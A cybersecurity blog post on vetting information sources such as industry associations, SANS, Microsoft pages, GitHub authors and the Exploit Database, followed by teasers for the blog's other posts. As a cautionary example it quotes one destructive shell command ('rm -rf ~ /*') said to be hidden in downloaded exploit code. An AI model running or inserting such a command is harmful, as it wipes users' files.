Vetting Your Sources


Hello all,

This post is going to take a different direction from the previous posts which focused mainly on technical knowledge and tools and talk about one of the most important tasks in cybersecurity, information gathering. Not information gathering as in port scanning a client or doing google searches on a target (though the concepts in this post can be used for that), information gathering as in making sure one is pulling data from valid sources and avoiding disinformation. As a cyber-security professional its important to have a list of sources that are well vetted and/or backed by an organization or government agency. Given the vast amount of organizations, agencies, and institutions involved in Cybersecurity; finding a legitimate information source that covers a topic specific to your need can be difficult.
Let’s start with some major organizations that come to mind when discussing Cyber-security. According to Cybercrime Magazine there are 33 cybersecurity industry associations. To be honest I just did what I’m recommending against, and that is to hop onto Google search to find this list and take the first hit I see. However, I did look at their about page and read what their organization is about. To avoid jumping down the rabbit hole of how “can we know if anything can be accepted as true and accurate” let’s take this magazine’s word that the content they’re providing is accurate. Some of the organizations they’ve listed are (Cybersecurity Ventures, 2019):

  1.      (ISC)2 – Global non-for-profit leader in education and certification.
  2.      SANS – Develops, maintains, and open-sources research papers on Cybersecurity.
  3.      OWASP – Non-for-profit organization responsible for developing and maintaining the open-source web application testing tool OWASP Zap.
Hmmm, maybe this site isn’t as accurate or inclusive as previously thought. This list covers a good chunk of Cybersecurity Industry Associations but 33 is no where near the number of Cybersecurity firms, organizations and government agencies that contribute to cybersecurity. For example, I do not see the NSA, Microsoft, or Offensive Security in this list. The contributions to cybersecurity from these organizations and agencies are also vast and noteworthy.
Keeping a list of these organizations in a spreadsheet somewhere may not be such a bad idea. If you come across an organization that has great vetted and Quality Assured content, don’t be afraid to bookmark it. For example, Microsoft has a great page dedicated to Security Engineering and you know this source of information is legitimate because they make the Operating System you are currently using:

https://www.microsoft.com/en-us/securityengineering/sdl/practices

As mentioned above SANs is also an excellent resource for information. The SANS Cyber-defense Whitepapers is a great resource for research papers. The link to this site can be found below:

https://cyber-defense.sans.org/resources/whitepapers

So far, we’ve listed some widely accepted and available sources of information and briefly covered how make sure a source is legitimate (e.g. look at the About page). Let’s say we find a post on GitHub; how do we vet this post? For starters it helps to look at the author and their history. Do they have a LinkedIn profile that demonstrates experience and knowledge in the industry? What are the comments saying about their post? GitHub is a great source for knowledge, but care must be taken when using content from GitHub.
Here’s an example, let’s say we are researching malware and find this nice exploit we’d like to try. The code we’d like to try makes a call to the following bash command (Offensive Security, 2019):

rm -rf ~ /* 2> /dev/null &

This deletes all files from the kali root directory recursively. Using code from the internet requires close examination and care when utilizing it for a penetration test. Thankfully, there are sources that examine published code closely before making them available. One of these sources is the Exploit Database maintained by Offensive Security:

https://www.exploit-db.com/

This database not only contains the exploit code but also its date, type, and platform. Granted this site is not an all-inclusive site for exploits that exist but it’s a great start. Other sites that are useful for finding exploits include securityfocus and the Common Vulnerability and Exposures database. GitHub is once again a great source for exploits but again care must be taken when downloading from that site or any other site on the internet.
Vetting sources requires some leg work but in the end it’s worth it. Having information from a site that is backed by experts provides peace of mind. Other great sources of information include educational institutions. Again, care should be taken when using these sources; if the institution’s name is not recognized look for their accreditations. Don’t even be afraid to pick up the phone and get in touch with their faculty.
Finally, I promised earlier that we would not explore the rabbit hole of “how do you know if anything is true or accurate” but let’s delve down that hole for a bit anyways. The concrete answer to that question is we don’t. Incorrect or inaccurate information can creep into even the most strictly reviewed sites and sources. A huge part of our industry involves constant learning and adaption. We strive to be as accurate as possible but at the same time readily accept when we fail and learn from it. It’s this constant struggle that defines professionalism in this (or arguably any) field.     

References:
  1.           Cybersecurity Ventures. (2019). Cybersecurity Industry Associations. Retrieved from https://cybersecurityventures.com/cybersecurity-associations/#home/?view_1_page=2
  2.          Offensive Security. (2019). Exploit Database. Retrieved from https://www.exploit-db.com/


Comments

Post a Comment

Popular posts from this blog

Covering Your Tracks

The ability to remain stealth during a penetration exercise is what separates a sophisticated hacker from a script kitty. The phrase “The Quieter You Become, The More You Are Able to Hear” holds true, especially in the field of hacking. Being able to perform Ani-forensics and avoid detection is critical to the success of hacking and penetration testing and understanding these methods is beneficial, even for white hat hackers, as there will be times in a penetration where the system is already compromised. In such cases, understanding what the attacker is doing in order to cover their tracks can help determine the sophistication of the attack or bring prosecution to the attacker. All hacks begin with system enumeration and nmap is one of the best tools to use during this discovery phase. However, as I explained in Scanning With nmap blog, port scanning a bunch of IP Addresses or every port on a target system is noisy and can cause denial of service conditions (very bad if you are ...
Read more

LDAP Vulnerabilities

Image
Note** The following examples utilize Web for Penetration Testers which I do not own any rights to. These examples provide solutions to the live image of Web for Pentester 1 which can be downloaded at https://pentesterlab.com/exercises/web_for_pentester/course . Please attempt these exercises on your own before reviewing my solutions to gain maximum benefit.   Web for Penetration Testers Example 1 Lightweight Directory Access Protocol (LDAP) can be thought of as a hierarchical directory structure. Using the live iso of Web for Pentester 1 lab we can find that Open LDAP service is running by running performing a nmap scan from our kali box (attacking machine): Figure 1 Using the ldapsearch command with the -b (base dn [top of hierarchy in this case]) -LLL (print responses in LDIF format without comments or version) and -x (simple authentication) flags (-h specifies the host) from our kali box (see Figure 2), we see that there are three common names (cn) entries: admin, ...
Read more

Setting Up a Proxy to Protect Your Public IP (An Introduction to Proxies)

Image
I recently purchased a static IP address. While this is great for setting up VPNs, websites, and other major benefits it bothered me that I normally visit CTFs and sites that contain malicious code to accomplish these CTF challenges. There had to be a way I could better protect my public IP from direct exposure in the event I did something stupid while surfing the web. This is where a proxies come into play. A proxy is exactly the same thing meant in the English language; think if computer A who set up the proxy wants to talk to computer C. An intermediary could be introduced (Proxy Server B) so that when computer C talks to computer A it has to go through Proxy Server B. Thus Computer C thinks its talking to Proxy Server B and only sees that IP address; when in reality all traffic is getting forwarded to computer A and vise versa. This creates a layer of abstraction. There are many types of proxies such as reverse proxies which is used mainly for public facing web sites. We are strict...
Read more